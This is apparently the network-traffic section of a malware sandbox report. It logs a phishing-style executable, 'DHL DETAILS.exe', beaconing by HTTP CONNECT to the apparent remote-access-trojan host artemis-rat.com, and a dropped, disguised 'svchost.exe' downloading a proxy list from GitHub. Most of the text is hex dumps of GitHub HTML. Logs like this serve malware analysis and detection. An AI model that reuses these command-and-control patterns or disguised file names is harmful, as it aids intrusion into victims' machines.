2024-03-09 12:14:10 UTC	1370	IN	Data Raw: 65 72 74 5f 69 6e 64 65 78 5f 6a 73 2d 37 32 63 39 66 62 64 65 35 61 64 34 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 62 65 68 61 76 69 6f 72 73 5f 64 69 73 74 5f 65 73 6d 5f 64 69 6d 65 6e 73 69 6f 6e 73 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6a 74 6d 6c 5f 6c 69 62 5f 69 6e 64 65 78 Data Ascii: ert_index_js-72c9fbde5ad4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_jtml_lib_index
2024-03-09 12:14:10 UTC	1370	IN	Data Raw: 62 5f 62 65 68 61 76 69 6f 72 73 5f 69 6e 63 6c 75 64 65 2d 34 36 37 37 35 34 2d 66 39 62 64 34 33 33 65 39 35 39 31 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 63 6f 6d 6d 65 6e 74 69 6e 67 5f 65 64 69 74 5f 74 73 2d 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f Data Ascii: b_behaviors_include-467754-f9bd433e9591.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	51523	172.67.140.87	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-09 12:14:14 UTC	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
2024-03-09 12:14:14 UTC	161	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:14 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: -
2024-03-09 12:14:14 UTC	155	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	51524	172.67.140.87	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-09 12:14:14 UTC	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
2024-03-09 12:14:14 UTC	161	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:14 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: -
2024-03-09 12:14:14 UTC	155	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	53536	222.255.238.159	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-09 12:14:18 UTC	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
2024-03-09 12:14:18 UTC	192	IN	HTTP/1.1 500 Internal Server Error Date: Sat, 09 Mar 2024 12:14:18 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 613 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-03-09 12:14:18 UTC	613	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.<

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	53639	102.223.20.217	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-09 12:14:18 UTC	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
2024-03-09 12:14:19 UTC	192	IN	HTTP/1.1 500 Internal Server Error Date: Sat, 09 Mar 2024 12:14:18 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 613 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-03-09 12:14:19 UTC	613	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.<

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	55293	140.82.114.3	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-09 12:14:25 UTC	101	OUT	GET /TheSpeedX/PROXY-List/blob/master/http.txt HTTP/1.1 Host: github.com Connection: Keep-Alive
2024-03-09 12:14:26 UTC	506	IN	HTTP/1.1 200 OK Server: GitHub.com Date: Sat, 09 Mar 2024 12:14:10 GMT Content-Type: text/html; charset=utf-8 Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With ETag: W/"8f9786a31fe2b7e37921fa8c44233cd3" Cache-Control: max-age=0, private, must-revalidate Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: no-referrer-when-downgrade
2024-03-09 12:14:26 UTC	3590	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.
2024-03-09 12:14:26 UTC	21	IN	Data Raw: 63 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: connection: close
2024-03-09 12:14:26 UTC	1370	IN	Data Raw: 38 30 30 30 0d 0a 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 0a 20 20 6c 61 6e 67 3d 22 65 6e 22 0a 20 20 0a 20 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 0a 20 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 20 64 61 74 61 2d 61 31 31 79 2d 6c 69 6e 6b 2d 75 6e 64 65 72 6c 69 6e 65 73 3d 22 74 72 75 65 22 0a 20 20 3e 0a 0a 0a 0a 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 Data Ascii: 8000<!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system" data-a11y-link-underlines="true" > <head> <meta charset="utf-8"> <link rel="dns-pr
2024-03-09 12:14:26 UTC	1370	IN	Data Raw: 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 64 61 72 6b 5f 63 6f 6c 6f 72 62 6c 69 6e 64 2d 61 66 61 39 39 64 63 66 34 30 66 37 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 5f 63 6f 6c 6f 72 62 6c 69 6e 64 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f Data Ascii: ="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-afa99dcf40f7.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/
2024-03-09 12:14:26 UTC	1370	IN	Data Raw: 67 69 74 68 75 62 2d 66 34 64 38 35 37 63 62 63 39 36 61 2e 63 73 73 22 20 2f 3e 0a 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 72 65 70 6f 73 69 74 6f 72 79 2d 36 32 34 37 63 61 32 33 38 66 64 34 2e 63 73 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 Data Ascii: github-f4d857cbc96a.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/repository-6247ca238fd4.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubass
2024-03-09 12:14:26 UTC	1370	IN	Data Raw: 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 73 74 61 63 6b 74 72 61 63 65 2d 70 61 72 73 65 72 5f 64 69 73 74 5f 73 74 61 63 6b 2d 74 72 61 63 65 2d 70 61 72 73 65 72 5f 65 73 6d 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 72 6f 2d 61 34 63 31 38 33 2d 37 39 66 39 36 31 31 63 32 37 35 62 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 Data Ascii: ps://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-a4c183-79f9611c275b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://gi
2024-03-09 12:14:26 UTC	1370	IN	Data Raw: 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 63 6f 6d 62 6f 62 6f 78 2d 6e 61 76 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6d 61 72 6b 64 6f 77 6e 2d 74 6f 6f 6c 62 61 72 2d 65 2d 38 32 30 66 63 30 2d 62 63 38 66 30 32 62 39 36 37 34 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 Data Ascii: " defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_combobox-nav_dist_index_js-node_modules_github_markdown-toolbar-e-820fc0-bc8f02b96749.js"></script><script crossorigin="anonymous" defer
2024-03-09 12:14:26 UTC	1370	IN	Data Raw: 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 65 6c 65 6d 65 6e 74 2d 72 65 67 69 73 74 72 79 2d 33 33 38 66 62 37 63 34 37 65 37 63 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f Data Ascii: fer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-338fb7c47e7c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendo
2024-03-09 12:14:26 UTC	1370	IN	Data Raw: 65 72 74 5f 69 6e 64 65 78 5f 6a 73 2d 37 32 63 39 66 62 64 65 35 61 64 34 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 62 65 68 61 76 69 6f 72 73 5f 64 69 73 74 5f 65 73 6d 5f 64 69 6d 65 6e 73 69 6f 6e 73 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6a 74 6d 6c 5f 6c 69 62 5f 69 6e 64 65 78 Data Ascii: ert_index_js-72c9fbde5ad4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_jtml_lib_index
2024-03-09 12:14:26 UTC	1370	IN	Data Raw: 62 5f 62 65 68 61 76 69 6f 72 73 5f 69 6e 63 6c 75 64 65 2d 34 36 37 37 35 34 2d 66 39 62 64 34 33 33 65 39 35 39 31 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 63 6f 6d 6d 65 6e 74 69 6e 67 5f 65 64 69 74 5f 74 73 2d 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f Data Ascii: b_behaviors_include-467754-f9bd433e9591.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	55292	140.82.114.3	443	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-09 12:14:25 UTC	101	OUT	GET /TheSpeedX/PROXY-List/blob/master/http.txt HTTP/1.1 Host: github.com Connection: Keep-Alive
2024-03-09 12:14:26 UTC	506	IN	HTTP/1.1 200 OK Server: GitHub.com Date: Sat, 09 Mar 2024 12:14:10 GMT Content-Type: text/html; charset=utf-8 Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With ETag: W/"8f9786a31fe2b7e37921fa8c44233cd3" Cache-Control: max-age=0, private, must-revalidate Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: no-referrer-when-downgrade
2024-03-09 12:14:26 UTC	3603	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.
2024-03-09 12:14:26 UTC	1370	IN	Data Raw: 38 30 30 30 0d 0a 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 0a 20 20 6c 61 6e 67 3d 22 65 6e 22 0a 20 20 0a 20 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 0a 20 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 20 64 61 74 61 2d 61 31 31 79 2d 6c 69 6e 6b 2d 75 6e 64 65 72 6c 69 6e 65 73 3d 22 74 72 75 65 22 0a 20 20 3e 0a 0a 0a 0a 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 Data Ascii: 8000<!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system" data-a11y-link-underlines="true" > <head> <meta charset="utf-8"> <link rel="dns-pr
2024-03-09 12:14:26 UTC	1370	IN	Data Raw: 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 64 61 72 6b 5f 63 6f 6c 6f 72 62 6c 69 6e 64 2d 61 66 61 39 39 64 63 66 34 30 66 37 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 5f 63 6f 6c 6f 72 62 6c 69 6e 64 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 